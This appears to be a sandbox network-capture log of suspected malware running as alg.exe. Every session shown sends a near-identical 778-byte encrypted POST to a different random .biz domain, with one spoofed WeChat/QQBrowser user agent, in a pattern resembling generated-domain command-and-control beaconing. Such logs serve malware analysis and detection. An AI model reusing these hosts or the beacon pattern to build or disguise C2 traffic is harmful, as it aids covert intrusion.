Nov 28, 2024 06:44:23.017647028 CET	347	OUT	POST /qij HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dlynankz.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:23.017728090 CET	778	OUT	Data Raw: e2 d4 c1 61 3d a2 f4 2d fe 02 00 00 7c a5 a1 5f de 89 25 30 3b b7 7d fe 1a 85 09 40 15 2c 12 8e 31 ff 11 74 c9 a0 22 0f 6d 2c ba 7b c2 42 11 39 5d 1b 2e e6 b2 a2 ef 12 42 0c 62 c2 d5 47 f1 4e 9b 85 83 8c 74 29 e7 1e a7 52 27 8c e2 32 ac 32 9e dd Data Ascii: a=-\|_%0;}@,1t"m,{B9].BbGNt)R'22{ajr9 .FQPF^6mFJ^J?m8}"IRhUk}7M2c$RN9&\J_#5!^`'_Bx?!uqQ8-kfv!'?Xl
Nov 28, 2024 06:44:24.378396034 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Thu, 28 Nov 2024 05:44:24 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Nov 28, 2024 06:44:24.383404016 CET	349	OUT	POST /tqsyw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dlynankz.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:24.383635044 CET	778	OUT	Data Raw: 04 c5 a2 5b 33 d1 f8 2d fe 02 00 00 81 61 09 f7 bb 23 eb 27 f3 4f 48 c3 be 63 47 e7 3a 27 b1 a9 46 94 da 9a f0 3b 37 d5 15 bf 00 44 e9 4f 08 ba c3 ce 97 cb f1 f3 65 80 18 d6 49 57 76 d6 ca b5 bd 80 e3 20 bb 29 ad a7 89 7c 29 6e ce ea c5 38 b9 34 Data Ascii: [3-a#'OHcG:'F;7DOeIWv )\|)n84<(->`wU9Sr(@'erLnLe&iqdc#78Uf_@yCuL6y<wQVR\rnglReh:)o}]
Nov 28, 2024 06:44:24.810265064 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Thu, 28 Nov 2024 05:44:24 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49937	47.129.31.212	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:25.431083918 CET	359	OUT	POST /qvfjyyauphqhfohc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oflybfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:25.431083918 CET	778	OUT	Data Raw: 0f 3f 25 c2 ee 92 a0 33 fe 02 00 00 36 6d 47 a2 31 2c 1b 20 b1 f0 2b cc cd a1 72 86 2e b1 70 bb 8d f1 a4 41 6a f8 95 ae 0e 53 25 0f f6 a2 ae 31 fb ba 50 1c c4 9a 8d 1d 7e 23 42 e7 5b 19 29 9f 00 52 88 35 d5 44 5b 97 42 d4 83 16 b5 b0 a9 9f 67 97 Data Ascii: ?%36mG1, +r.pAjS%1P~#B[)R5D[Bg4*b[A?6__oTW}RK9kjN>Yb]L}/cf1aju&{kas>2r2Cc>OSXS<RV
Nov 28, 2024 06:44:27.498636961 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f21bdcb24576dfd82625f69a9872ebb8\|8.46.123.228\|1732772667\|1732772667\|0\|1\|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49938	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:28.114975929 CET	343	OUT	POST /bb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yhqqc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:28.114999056 CET	778	OUT	Data Raw: a1 ee 87 6d 1b a0 55 99 fe 02 00 00 64 3d 4d 67 77 d4 72 d1 95 00 0d c7 c3 17 0e e8 db 86 2b 78 eb e9 92 9d a5 d8 45 80 23 23 e1 e0 b0 ba 0e 39 d7 85 d1 4c 99 88 33 65 2a 68 8d fe f1 3f 3a f9 58 d0 a2 dc 18 55 3d 85 97 1d 72 8d 33 66 07 d3 89 ba Data Ascii: mUd=Mgwr+xE##9L3e*h?:XU=r3fs -Kzz/:D>K-(`12,2:]F{$3Owgv<x("kw`7x"d$<q/(EP85!s12sUHb~WR75WY:<\|z
Nov 28, 2024 06:44:29.608851910 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8fc404dfe3da1f79ec2080d8ae50be92\|8.46.123.228\|1732772669\|1732772669\|0\|1\|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49939	47.129.31.212	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:30.231471062 CET	347	OUT	POST /kdqjc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: mnjmhp.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:30.231487989 CET	778	OUT	Data Raw: d4 bb f6 a5 e8 dc b5 3d fe 02 00 00 f6 7d e8 98 7c f7 1b e0 14 b7 86 c0 98 e5 71 c9 91 13 d5 94 fb 28 71 88 ab 04 99 69 a3 72 d0 ce 2e 70 cf dc d0 c9 c4 a2 bb bf 3f 78 47 d7 ee 02 6b 8a f8 0b 7e d9 37 e2 6b 21 99 e1 1c 72 2e b7 d9 7f 80 41 93 0d Data Ascii: =}\|q(qir.p?xGk~7k!r.AUs}G+=0\u\|\=Y^l006rF*0Sx@<XHn@88.U"8]M<z'+
Nov 28, 2024 06:44:32.293560982 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b0bd8378d8d43c9a5af34909402809b8\|8.46.123.228\|1732772671\|1732772671\|0\|1\|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49941	18.208.156.248	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:32.891911983 CET	347	OUT	POST /yy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: opowhhece.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:32.891931057 CET	778	OUT	Data Raw: 35 a0 9d 5a b7 d5 0b 29 fe 02 00 00 fc 8c de ff 3e c9 e5 95 78 04 7c 03 c8 12 b9 3d 05 41 18 be 27 eb a7 1a 4e 52 b1 73 d7 77 5e 9b 5a 94 7e 9d 35 01 d1 14 b1 6b c5 91 15 a9 9c 53 9a e1 ed 37 42 54 1b 36 f6 97 da c7 ca ff 0a 1a f5 26 36 a9 dd 51 Data Ascii: 5Z)>x\|=A'NRsw^Z~5kS7BT6&6Q=_GC/$t$`RtaIWvAtC2U$Jt1,{3$l,2=>D" [$5ck1sN8&iOA#.e_'T~
Nov 28, 2024 06:44:34.042906046 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5065351676e55f22a836b3ab51a431fe\|8.46.123.228\|1732772673\|1732772673\|0\|1\|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49942	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:35.156191111 CET	343	OUT	POST /j HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jdhhbs.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:35.156191111 CET	778	OUT	Data Raw: 30 75 84 31 4d 7f 8b f2 fe 02 00 00 c6 4e 39 01 20 fe 5a 05 1a d1 a7 0a c1 b0 9c e6 88 eb 78 56 3e 09 ff cd 76 7f 63 ee e1 63 30 11 14 a8 dd 95 2f aa cc 9e 96 c6 b3 7a 76 83 f2 de c4 8a 43 8a c3 85 57 d4 8b fb 73 41 df 0d 02 c2 f3 c4 af b5 24 93 Data Ascii: 0u1MN9 ZxV>vcc0/zvCWsA$[(&Ez!0wTRJV`e)?0>9qdK ZDR3~N<o.rnYKCNF&s%mQ:0ghdh\|&ju%>\|$=B
Nov 28, 2024 06:44:37.287375927 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=765418e415ff7522e2eec27603acb2ea\|8.46.123.228\|1732772676\|1732772676\|0\|1\|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49943	34.246.200.160	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:37.899256945 CET	346	OUT	POST /q HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: mgmsclkyu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:37.899270058 CET	778	OUT	Data Raw: 90 42 29 b1 d4 e5 34 f6 fe 02 00 00 71 f0 6c e8 f6 c3 33 d1 24 c4 32 3f f2 7b 90 0a b1 34 61 da c1 5f 96 1b 2e c3 7e 91 1a 58 e6 53 2d f0 16 5f ee fa 0b 23 44 81 f2 c6 b6 23 58 75 75 96 26 36 4c 08 b4 20 66 c6 56 08 d2 88 97 ed a9 e9 43 c9 29 ea Data Ascii: B)4ql3$2?{4a_.~XS-_#D#Xuu&6L fVC)4I<a/I:/L4&OT'ZXNg^$=IN j/1O<<GLTBM#Z'Fk{Xf8fE(jkg'E%Qh"fBJx.7
Nov 28, 2024 06:44:39.330457926 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=008db38a631f9e2384c9fbff94839799\|8.46.123.228\|1732772679\|1732772679\|0\|1\|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49944	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:39.933715105 CET	348	OUT	POST /rcsqd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: warkcdu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:39.933715105 CET	778	OUT	Data Raw: c4 27 9a 1e e9 b4 41 82 fe 02 00 00 84 03 1b bf b7 08 3f b6 a4 28 45 49 b5 ca 49 80 20 9d fb 2a 6d 78 82 84 d4 09 d0 39 f2 df 47 ff df f6 f0 ae 2c f9 21 86 12 3b bd 02 ca 2b 12 93 d7 50 65 1d a1 f9 6f 67 78 a4 86 d2 38 f8 28 29 56 11 9b 6d 03 be Data Ascii: 'A?(EII mx9G,!;+Peogx8()Vm\d)Qu-E:GOg1<NR,4u ^Dx1H8y"a\|0R j3L[-F[3X_.K5-=!xmPf0e<o`qg"ZO9
Nov 28, 2024 06:44:42.053822994 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=966c25713a328eeccc6681645cfb5b65\|8.46.123.228\|1732772681\|1732772681\|0\|1\|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49945	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:42.681236982 CET	353	OUT	POST /xindlfknrhvc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gcedd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:42.681461096 CET	778	OUT	Data Raw: bb 67 39 b4 1e 42 dc 6f fe 02 00 00 a7 14 88 dd 40 31 cb 73 a5 d7 b9 18 77 33 08 77 13 c7 ec e5 66 af 73 52 5a 28 3e 5f 1e c3 a5 c9 09 66 b5 ae 10 f3 1e c8 ea 72 35 fb f7 c8 ce 57 be eb 2e 59 a3 1a 91 6c e3 c1 3f 7e be 4c dd ea 7a 3c 73 d2 44 b7 Data Ascii: g9Bo@1sw3wfsRZ(>_fr5W.Yl?~Lz<sD^AZ"'f*I#I. OfSPsU"P+qMxx~tQYI>{Te!&MuaMUAc0~M\LL\
Nov 28, 2024 06:44:44.702972889 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6c07f6f2ad4cb0eb82f267453053b335\|8.46.123.228\|1732772684\|1732772684\|0\|1\|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49946	18.208.156.248	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:45.315984964 CET	354	OUT	POST /mfrwurnrh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jwkoeoqns.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:45.316040993 CET	778	OUT	Data Raw: 1c 4c e1 69 ed 3b 32 5b fe 02 00 00 92 44 c3 90 c0 0d b0 af 02 31 dc e2 14 98 16 e5 99 13 88 c1 31 8a 33 af 82 27 fe 0a 05 d1 ac 8f ed c7 20 23 75 45 67 44 66 e0 39 e2 5d 2a dd fc f4 8f 80 3d 6c d2 68 34 6c 4c 53 57 ec 17 6e a3 42 44 df 1c a9 68 Data Ascii: Li;2[D113' #uEgDf9]=lh4lLSWnBDhT0{J;LlDG0{&@HQw@>_PcJ=tODe-!Wdam]kh\sIf8^:=xd7Rx`D+)VMxpm\
Nov 28, 2024 06:44:46.465105057 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b43bd169a796055e8503b068262d2571\|8.46.123.228\|1732772686\|1732772686\|0\|1\|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49947	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:47.067481995 CET	348	OUT	POST /reejrob HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xccjj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:47.067511082 CET	778	OUT	Data Raw: b7 26 d2 97 db 80 af 79 fe 02 00 00 b5 11 f6 36 c3 18 77 45 bf 54 a9 ad 48 8a 64 1f bf 16 87 57 4b 93 05 f2 c7 81 53 b3 2c a8 cc b4 6b 5e 27 35 2d bc b6 89 10 ef a6 df 79 5b 74 03 b9 c0 a4 2f 0e 31 2e ca 03 79 33 e0 33 ce ed 1b 1e 68 a6 e0 6a 29 Data Ascii: &y6wETHdWKS,k^'5-y[t/1.y33hj)527,_l^vmk5ZVJ\^QogZM!{~@=HL`dP@HFvMDobO,jI6]'=,92HE>prQ11L!91B#F
Nov 28, 2024 06:44:48.463112116 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=abdceb15f22db3fb35696b3c78c06947\|8.46.123.228\|1732772688\|1732772688\|0\|1\|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49948	44.221.84.105	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:49.068206072 CET	351	OUT	POST /ircdert HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: hehckyov.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:49.068218946 CET	778	OUT	Data Raw: 86 7a 06 1a e8 cf d6 7e fe 02 00 00 64 11 f4 a7 81 28 63 00 af 4e 73 44 2e ab 24 71 f6 60 e6 e8 15 a6 1e 8b 32 53 ef 26 e6 8a a6 17 8d 6d 56 9c f2 f5 60 7a 47 94 78 45 de d2 0d e2 84 3e a1 68 2b d1 5c e4 3b a1 9c c2 34 85 61 34 86 2e 91 25 08 06 Data Ascii: z~d(cNsD.$q`2S&mV`zGxE>h+\;4a4.%ZNSnK3K4E:&A&?w+/}p17(`>n9Tp>B;+zj`r{p^ol"5~'a5rB7.+WyX_o1J\;w8/[o(T0xBI)@
Nov 28, 2024 06:44:50.270873070 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b16d83b75c32216fff0e8ea3c9cbcad3\|8.46.123.228\|1732772690\|1732772690\|0\|1\|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49949	54.244.188.177	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:50.867897987 CET	353	OUT	POST /msoqwwrwyts HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: rynmcq.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:50.867918968 CET	778	OUT	Data Raw: ba ab b7 28 88 00 c1 2e fe 02 00 00 40 ca 8d a8 77 15 08 1a f4 99 f4 09 c4 82 64 02 34 58 f1 d7 46 9e 3a 7d 8d 02 3f 39 6e 32 c9 57 93 48 e8 24 84 09 1a 86 d3 4e 0d bc 97 74 a6 cb 71 4c 16 be e7 f6 34 f6 15 86 43 d1 1c eb fa 52 47 2c 08 a7 7c 88 Data Ascii: (.@wd4XF:}?9n2WH$NtqL4CRG,\|b6kx6}mC0+v<#ZAO3mCLMMIk#*jO9JYoiYF8%$z"Y;RAURzC)/Y-Z]ZF
Nov 28, 2024 06:44:52.281848907 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6132d2dcabfd518ba9cfc662aab76f84\|8.46.123.228\|1732772692\|1732772692\|0\|1\|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49950	3.254.94.185	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:52.880047083 CET	351	OUT	POST /rmkysabgpk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: uaafd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:52.880079031 CET	778	OUT	Data Raw: bd c6 6e 9f 3e ba 70 3f fe 02 00 00 6c 88 f2 ae cc bc a2 21 1c b8 43 b0 e2 b5 e3 4b 20 33 43 c5 38 e1 0e 8a bd 7b 8b b6 06 a1 af 4f 74 34 32 34 1b 0e c0 d4 d3 2a 86 50 d5 ef d6 26 9d 45 2a 69 fe 8f b4 1c ae 21 f4 ff c9 7a 4f 17 e4 41 48 64 04 d5 Data Ascii: n>p?l!CK 3C8{Ot424P&Ei!zOAHd3x^zh@((a#TCW;j.I6"`.gNQ\|dX]K`x&3M]In~SxirzzQb\"5M.I?,uKZ
Nov 28, 2024 06:44:54.310708046 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0f933ad2628ff48c0544200227622f23\|8.46.123.228\|1732772694\|1732772694\|0\|1\|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49951	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:54.939295053 CET	346	OUT	POST /dw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: eufxebus.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:54.939364910 CET	778	OUT	Data Raw: 22 75 9a 02 b1 9e db 44 fe 02 00 00 fa 9a 1b f3 2a cb 1a 49 b5 dc e0 8c 88 1a 0c 51 00 bf da 16 a1 3e 51 e6 5d 5e ed 37 15 f7 81 55 d7 25 d9 64 78 35 e4 ba 1e 9b 5b 2c 4e 8e 8e d2 d6 f0 83 e8 40 b7 b7 66 55 f8 59 a1 57 ac 66 99 38 fc 9a ec 65 59 Data Ascii: "uDIQ>Q]^7U%dx5[,N@fUYWf8eY^ Gg000.LBIpae>aaY1md~^\hlR9_<SMHR%0&v,5c,Xss5ig`9rt5?H"
